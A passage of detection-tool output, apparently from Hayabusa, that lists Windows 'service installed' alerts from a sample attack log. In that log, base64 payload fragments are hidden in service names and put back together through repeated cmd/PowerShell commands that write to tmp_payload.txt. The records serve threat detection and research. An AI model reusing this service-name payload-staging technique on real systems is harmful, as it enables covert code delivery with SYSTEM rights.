start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:04.364 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 9ubmVjdGlvbg0KDQojQHBhcmFtICRDcmVkICAgICAtPiAgVGhlIEV2ZW50IExvZw0KI0BwYXJhbSAkQ29tcHV0ZXIgLT4gIFRoZSBhdmcgZXZlbnRzIHBlciBzZWNvbmQgZm9yIHRoZSBnaXZlbiBs | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg76"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:04.364 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 9ubmVjdGlvbg0KDQojQHBhcmFtICRDcmVkICAgICAtPiAgVGhlIEV2ZW50IExvZw0KI0BwYXJhbSAkQ29tcHV0ZXIgLT4gIFRoZSBhdmcgZXZlbnRzIHBlciBzZWNvbmQgZm9yIHRoZSBnaXZlbiBs | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg76"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:05.817 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: b2cNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg77"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:05.817 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: b2cNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg77"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:05.817 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: b2cNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg77"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:07.256 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: lvbiBUZXN0LUhvc3RDb25uZWN0aW9uIHsgcGFyYW0oJENvbXB1dGVyKSAgICANCg0KICAgIHRyeSB7DQoNCiAgICAgICAgaWYgKChUZXN0LUNvbm5lY3Rpb24gLUNvbXB1dGVyTmFtZSAkQ29tcHV0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg78"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:07.256 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: lvbiBUZXN0LUhvc3RDb25uZWN0aW9uIHsgcGFyYW0oJENvbXB1dGVyKSAgICANCg0KICAgIHRyeSB7DQoNCiAgICAgICAgaWYgKChUZXN0LUNvbm5lY3Rpb24gLUNvbXB1dGVyTmFtZSAkQ29tcHV0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg78"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:07.256 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: lvbiBUZXN0LUhvc3RDb25uZWN0aW9uIHsgcGFyYW0oJENvbXB1dGVyKSAgICANCg0KICAgIHRyeSB7DQoNCiAgICAgICAgaWYgKChUZXN0LUNvbm5lY3Rpb24gLUNvbXB1dGVyTmFtZSAkQ29tcHV0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg78"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:08.709 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZXIgLWNvdW50IDEgLXF1aWV0KSkgew0KDQogICAgICAgICAgICByZXR1cm4gJHRydWUNCiAgICAgICAgfQ0KDQogICAgICAgIGVsc2Ugew0KDQoNCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg79"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:08.709 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZXIgLWNvdW50IDEgLXF1aWV0KSkgew0KDQogICAgICAgICAgICByZXR1cm4gJHRydWUNCiAgICAgICAgfQ0KDQogICAgICAgIGVsc2Ugew0KDQoNCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg79"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:08.709 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZXIgLWNvdW50IDEgLXF1aWV0KSkgew0KDQogICAgICAgICAgICByZXR1cm4gJHRydWUNCiAgICAgICAgfQ0KDQogICAgICAgIGVsc2Ugew0KDQoNCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg79"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:10.219 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: JfTE9HICJVbmFibGUgdG8gY29udGFjdCAkQ29tcHV0ZXIuIFBsZWFzZSB2ZXJpZnkgaXRzIG5ldHdvcmsgY29ubmVjdGl2aXR5IGFuZCB0cnkgYWdhaW4iDQoNCiAgICAgICAgICAgICRHbG9iYWw6 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg80"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:10.219 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: JfTE9HICJVbmFibGUgdG8gY29udGFjdCAkQ29tcHV0ZXIuIFBsZWFzZSB2ZXJpZnkgaXRzIG5ldHdvcmsgY29ubmVjdGl2aXR5IGFuZCB0cnkgYWdhaW4iDQoNCiAgICAgICAgICAgICRHbG9iYWw6 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg80"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:10.219 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: JfTE9HICJVbmFibGUgdG8gY29udGFjdCAkQ29tcHV0ZXIuIFBsZWFzZSB2ZXJpZnkgaXRzIG5ldHdvcmsgY29ubmVjdGl2aXR5IGFuZCB0cnkgYWdhaW4iDQoNCiAgICAgICAgICAgICRHbG9iYWw6 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg80"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:11.712 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Q29ubmVjdGlvbklzc3VlcyA9ICRHbG9iYWw6Q29ubmVjdGlvbklzc3VlcyArIDENCg0KICAgICAgICAgICAgcmV0dXJuICRmYWxzZQ0KICAgICAgICB9ICAgICAgICANCiAgICB9DQoNCiAgICBjYX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg81"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:11.712 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: Q29ubmVjdGlvbklzc3VlcyA9ICRHbG9iYWw6Q29ubmVjdGlvbklzc3VlcyArIDENCg0KICAgICAgICAgICAgcmV0dXJuICRmYWxzZQ0KICAgICAgICB9ICAgICAgICANCiAgICB9DQoNCiAgICBjYX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg81"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:11.712 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Q29ubmVjdGlvbklzc3VlcyA9ICRHbG9iYWw6Q29ubmVjdGlvbklzc3VlcyArIDENCg0KICAgICAgICAgICAgcmV0dXJuICRmYWxzZQ0KICAgICAgICB9ICAgICAgICANCiAgICB9DQoNCiAgICBjYX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg81"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:13.157 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSBjb25lY3QgdG8gSG9zdCINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg82"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:13.157 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: RjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSBjb25lY3QgdG8gSG9zdCINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg82"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:13.157 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSBjb25lY3QgdG8gSG9zdCINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg82"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:14.610 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbn | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg83"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:14.610 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbn | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg83"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:14.610 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbn | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg83"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:16.058 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCg0KICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg84"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:16.058 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: VtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCg0KICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg84"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:16.058 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCg0KICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg84"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:17.508 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gQ3JlYXRlIGEgbG9nIHJlcG9ydCBmb3IgdGhlIGVhY2ggY29tcHV0ZXIgaW4gdGhlIGNvbXB1dGVyIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg85"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:17.508 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gQ3JlYXRlIGEgbG9nIHJlcG9ydCBmb3IgdGhlIGVhY2ggY29tcHV0ZXIgaW4gdGhlIGNvbXB1dGVyIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg85"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:17.508 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gQ3JlYXRlIGEgbG9nIHJlcG9ydCBmb3IgdGhlIGVhY2ggY29tcHV0ZXIgaW4gdGhlIGNvbXB1dGVyIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg85"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:18.961 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: xpc3QNCg0KI0BwYXJhbSAkTG9nTmFtZSAgICAgICAgICAgIC0+ICBUaGUgRXZlbnQgTG9nDQojQHBhcmFtICRBdmdFdmVudHNQZXJTZWNvbmQgLT4gIFRoZSBhdmcgZXZlbnRzIHBlciBzZWNvbmQg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg86"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:18.961 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: xpc3QNCg0KI0BwYXJhbSAkTG9nTmFtZSAgICAgICAgICAgIC0+ICBUaGUgRXZlbnQgTG9nDQojQHBhcmFtICRBdmdFdmVudHNQZXJTZWNvbmQgLT4gIFRoZSBhdmcgZXZlbnRzIHBlciBzZWNvbmQg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg86"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:18.961 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: xpc3QNCg0KI0BwYXJhbSAkTG9nTmFtZSAgICAgICAgICAgIC0+ICBUaGUgRXZlbnQgTG9nDQojQHBhcmFtICRBdmdFdmVudHNQZXJTZWNvbmQgLT4gIFRoZSBhdmcgZXZlbnRzIHBlciBzZWNvbmQg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg86"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:20.414 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Zm9yIHRoZSBnaXZlbiBsb2cNCiNAcGFyYW0gJFRvdGFsTG9nRXZlbnRzICAgICAtPiAgVGhlIHRvdGFsICMgb2YgZXZlbnRzIGZvciB0aGUgZ2l2ZW4gbG9nDQoNCiMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg87"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:20.414 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: Zm9yIHRoZSBnaXZlbiBsb2cNCiNAcGFyYW0gJFRvdGFsTG9nRXZlbnRzICAgICAtPiAgVGhlIHRvdGFsICMgb2YgZXZlbnRzIGZvciB0aGUgZ2l2ZW4gbG9nDQoNCiMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg87"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:20.414 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Zm9yIHRoZSBnaXZlbiBsb2cNCiNAcGFyYW0gJFRvdGFsTG9nRXZlbnRzICAgICAtPiAgVGhlIHRvdGFsICMgb2YgZXZlbnRzIGZvciB0aGUgZ2l2ZW4gbG9nDQoNCiMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg87"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:21.867 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0KZnVuY3Rpb24gQ3JlYXRlLUxvZ1JlcG9ydCB7IHBh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg88"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:21.867 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 